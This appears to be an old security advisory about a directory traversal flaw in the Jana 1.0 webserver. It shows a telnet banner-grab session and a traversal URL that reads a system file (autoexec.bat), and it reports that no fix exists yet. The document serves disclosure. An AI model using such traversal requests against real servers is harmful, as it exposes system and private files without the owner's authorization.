COMMAND

    Jana

SYSTEMS AFFECTED

    Those using Jana 1.0 webserver

PROBLEM

    Jason Lutz found a  security flaw in Jana  1.0 webserver.  He  was
    not able  to find  out any  information on  who makes this product
    nor a place  to download the  web server package.   This webserver
    seems  to  be  included  as  a  suite of Internet services, one of
    witch Jason  thinks is  web-based chat.   Enclosed is  one exploit
    Jason found in the limited time that he had to deal with this  web
    server.

        [root@foo whis]# telnet x.x.x.x 80
        Trying x.x.x.x...
        Connected to x.x.x.x.
        Escape character is '^]'.
        GET / HTTP/1.0

        HTTP/1.0 200 OK
        Date: Mon, 04 Oct 1999 18:59:44 GMT
        Server: Jana Server/1.40
        Last-Modified: Mon, 04 Oct 1999 15:04:40 GMT
        Content-Length: 38
        Content-Type: text/html
        Connection: close

        <HTML><BODY><CENTER>TEST</BODY></HTML>Connection closed by foreign host.
        [root@foo whis]#

        http://server/....../autoexec.bat

        Prints user's autoexec.bat

SOLUTION

    Nothing yet.